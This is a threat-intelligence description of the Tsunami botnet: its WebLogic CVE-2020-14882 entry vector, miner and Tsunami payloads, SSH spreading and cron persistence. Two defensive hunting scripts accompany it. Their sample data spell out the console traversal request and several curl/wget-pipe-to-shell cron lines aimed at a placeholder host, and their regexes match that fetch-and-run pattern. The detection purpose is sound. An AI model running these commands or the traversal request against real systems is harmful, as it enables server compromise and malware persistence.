Tsunami Botnet Description
A recently established botnet named Tsunami has been undergoing rapid development, with infosec researchers observing a sizable increase in its capabilities within a short time. When the botnet's activity was first detected, it deployed a payload consisting of an XMRig Monero crypto-miner variant, and its compromise vector was misconfigured Docker API endpoints reachable from the network. Both aspects of the botnet have been modified significantly in the latest version.
The operators behind the botnet have switched the attack vector: Tsunami now propagates through a WebLogic vulnerability, specifically CVE-2020-14882, an unauthenticated remote code execution flaw in the Oracle WebLogic Server administration console rated 9.8 out of 10 on the CVSS scale. Oracle published a patch addressing the issue in October 2020, but many installations have not been patched and remain exposed to attack. The number of malware payloads delivered by the botnet doubled with the inclusion of Tsunami binaries in addition to the previously observed XMRig crypto-miner variants. For lateral movement within the compromised network, the malware uses SSH, enumerating SSH users, keys, known hosts, and ports on the infected machine to find systems it can reach. Infosec researchers who analyzed the malware's code discovered two sections of unused code: one dedicated to exploiting Redis, the other to SSH brute-forcing. The malware also gained the ability to terminate specific security solutions and monitoring tools, as well as the running processes of any competing mining tools that other threat actors may already have deployed on the compromised target.
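Exploitation of CVE-2020-14882 leaves a recognizable trace in the WebLogic (or fronting proxy) access log: a request to the unauthenticated /console/css/ or /console/images/ path that carries a double-URL-encoded "../" to climb back into console.portal, the pattern described in public analyses of the flaw. The following hunting script is an added example, not code from this page or from the botnet; it parses Common Log Format lines (an assumed layout), decodes the request path twice and flags matching requests. The log lines and the placeholder class name in the "handle=" parameter are constructed.

```python
"""Hunt WebLogic access logs for CVE-2020-14882 exploitation attempts.

Added example, not code from the original page or from the malware. The
traversal pattern is the one documented in public analyses of the CVE;
the log lines below are constructed.
"""
import re
from urllib.parse import unquote

# Public exploitation pattern: the unauthenticated static paths /console/css/
# and /console/images/ are abused with a double-URL-encoded "../"
# (%252e%252e%252f) to reach console.portal without logging in; a "handle="
# parameter then names a Java class for the console to instantiate.
CONSOLE_STATIC = re.compile(r"^/console/(css|images)/", re.IGNORECASE)
HANDLE_PARAM = re.compile(r"[?&]handle=", re.IGNORECASE)

# Common Log Format as written by most reverse proxies in front of WebLogic
# (assumed layout; adjust the regex to your own log format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_cve_2020_14882_request(path: str) -> bool:
    """True if the request path uses the console path traversal of CVE-2020-14882."""
    if not CONSOLE_STATIC.match(path):
        return False
    # Decode twice: the exploit double-encodes ".." so that one decoding pass
    # still leaves an innocuous-looking %2e%2e and only the second yields "..".
    # A single-encoded %2e%2e/ therefore also ends up flagged, which is intended.
    decoded = unquote(unquote(path))
    return "/../" in decoded and "console.portal" in decoded.lower()


def scan_access_log(lines):
    """Return (source IP, request path, verdict) for each suspicious request.

    'exploit' means the request also carries a handle= parameter, i.e. it tries
    to instantiate a class rather than merely test whether the traversal reaches
    the console; 'probe' means traversal only.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not this log format; skip the line
        path = m.group("path")
        if is_cve_2020_14882_request(path):
            verdict = "exploit" if HANDLE_PARAM.search(path) else "probe"
            hits.append((m.group("src"), path, verdict))
    return hits


# Constructed sample log: two benign console requests, one traversal probe, one
# traversal with a handle= parameter (the class name is a placeholder), and one
# probe using upper-case encoding against the /console/images/ path.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Oct/2020:10:15:01 +0000] "GET /console/css/console.css HTTP/1.1" 200 5120',
    '203.0.113.7 - - [29/Oct/2020:10:15:02 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 10234',
    '203.0.113.7 - - [29/Oct/2020:10:15:03 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.example.PlaceholderClass(%22arg%22) HTTP/1.1" 200 10234',
    '198.51.100.23 - - [29/Oct/2020:10:16:40 +0000] "POST /console/j_security_check HTTP/1.1" 302 0',
    '198.51.100.23 - - [29/Oct/2020:10:16:41 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 10234',
]

if __name__ == "__main__":
    for src, path, verdict in scan_access_log(SAMPLE_LOG):
        print(f"{verdict:8} {src:15} {path}")
```

A hit with the "exploit" verdict from a host that is not an administrator's workstation is worth treating as a confirmed compromise attempt; the "probe" verdict covers scanners that only check whether the traversal reaches the console page.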
During its multi-stage attack chain, the botnet delivers several .xms shell scripts and an even greater number of Python scripts. In general, the shell scripts prepare the environment for the delivery of the malware payloads: they run the process termination routines, uninstall certain endpoint defense solutions, and perform the SSH lateral movement by trying to infect hosts that the compromised server has previously connected to. The .xms scripts also establish the threat's persistence mechanism through cron jobs that download and execute the shell scripts and the Python scripts at fixed intervals (every 1, 2, 3, and 30 minutes, and every hour). /etc/init.d/down is also overwritten, so that the malware is relaunched at every system startup.
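The cron-based persistence described above can be hunted for generically: any job that fetches content from a URL and executes it, or that runs a script from a temporary directory every few minutes, deserves a look, as does an init script that does the same. The following script is an added example, not code from this page or from the malware. The crontab, the two init-script bodies and the 198.51.100.10 address are constructed stand-ins, and the regular expressions describe the general fetch-and-run shape rather than a signature of this particular botnet.

```python
"""Hunt a crontab and an init script for download-and-execute persistence.

Added example, not code from the original page or from the malware. The
crontab and init-script contents are constructed stand-ins; the patterns
encode the generic "fetch from a URL, then run it" shape.
"""
import re
from typing import Optional

# A command that pulls content from a URL with curl or wget ...
FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;&]*\b(https?|ftp)://")
# ... and executes a shell (.sh/.xms) or Python script, via a pipe or directly.
EXEC_RE = re.compile(
    r"\|\s*(ba)?sh\b"                  # curl ... | sh
    r"|\b(ba)?sh\s+\S+\.(sh|xms)\b"    # sh /tmp/x.xms
    r"|\bpython[23]?\s+\S+\.py\b"      # python /tmp/x.py
)
# minute hour day-of-month month day-of-week command
# (@reboot-style shortcuts and environment lines are deliberately skipped)
CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def minute_interval(minute: str, hour: str) -> Optional[int]:
    """Approximate run interval in minutes for the schedule forms droppers
    typically use: '*', '*/N' and a fixed minute with hour '*'. Anything
    else (specific hours, day restrictions) returns None."""
    if hour != "*":
        return None
    if minute == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", minute)
    if step:
        return int(step.group(1))
    if minute.isdigit():
        return 60
    return None


def classify_cron_line(line: str) -> Optional[dict]:
    """Return {'interval', 'cmd', 'reasons'} for a job line; None for
    comments, blank lines and lines that are not five-field jobs."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = CRON_RE.match(line)
    if not m:
        return None
    minute, hour, _dom, _mon, _dow, cmd = m.groups()
    reasons = []
    if FETCH_RE.search(cmd):
        reasons.append("downloads remote content")
    if EXEC_RE.search(cmd):
        reasons.append("executes a shell or Python script")
    interval = minute_interval(minute, hour)
    if interval is not None and interval <= 5:
        reasons.append(f"runs every {interval} min")
    return {"interval": interval, "cmd": cmd, "reasons": reasons}


def hunt_crontab(text: str) -> list:
    """All jobs with at least one reason, in file order."""
    return [c for c in map(classify_cron_line, text.splitlines()) if c and c["reasons"]]


def init_script_suspicious(content: str) -> bool:
    """An init script that fetches remote content and runs it is almost
    certainly not the distribution's own (think of a replaced /etc/init.d/down)."""
    return bool(FETCH_RE.search(content) and EXEC_RE.search(content))


# Constructed crontab in the shape the page describes (1, 2, 3 and 30 minute
# and hourly jobs) mixed with ordinary entries; 198.51.100.10 is a placeholder.
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/1 * * * * curl -fsSL http://198.51.100.10/a.xms | sh > /dev/null 2>&1
*/2 * * * * wget -q -O- http://198.51.100.10/b.xms | bash
*/3 * * * * python /tmp/.x/c.py
*/30 * * * * curl -s http://198.51.100.10/d.xms -o /tmp/d.xms; sh /tmp/d.xms
0 * * * * python3 /tmp/.x/e.py
0 3 * * * /usr/bin/certbot renew --quiet
17 * * * * cd / && run-parts --report /etc/cron.hourly
"""

# Constructed stand-in for an overwritten /etc/init.d/down ...
SUSPICIOUS_INIT_DOWN = """\
#!/bin/sh
curl -fsSL http://198.51.100.10/a.xms | sh
"""
# ... and for an ordinary init script that just starts a daemon.
BENIGN_INIT_SCRIPT = """\
#!/bin/sh
### BEGIN INIT INFO
# Provides: example-daemon
### END INIT INFO
case "$1" in
  start) /usr/sbin/example-daemon ;;
  stop)  pkill example-daemon ;;
esac
"""

if __name__ == "__main__":
    for job in hunt_crontab(SAMPLE_CRONTAB):
        print(f"[{job['interval']!s:>4} min] {job['cmd']}  <- {', '.join(job['reasons'])}")
    print("init.d/down suspicious:", init_script_suspicious(SUSPICIOUS_INIT_DOWN))
```

On a live host, feed it the output of "crontab -l" for every user plus the contents of /etc/crontab and /etc/cron.d/*, and run init_script_suspicious over each file in /etc/init.d; a script there that downloads and pipes to a shell has no legitimate reason to exist.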
The Python scripts, on the other hand, are the vehicles that deploy the botnet's malware payloads. There are four in total, and they fall into two distinct groups. The first group to be deployed installs the XMRig Monero crypto-miner and establishes its own cron-based persistence before launching the second group, which fetches the Tsunami binaries and starts them on the target.
The rapid development of the botnet, combined with the discovery of dormant functionality that could be enabled at any time, demonstrates how quickly cybercriminals can adapt and modify their malware tools.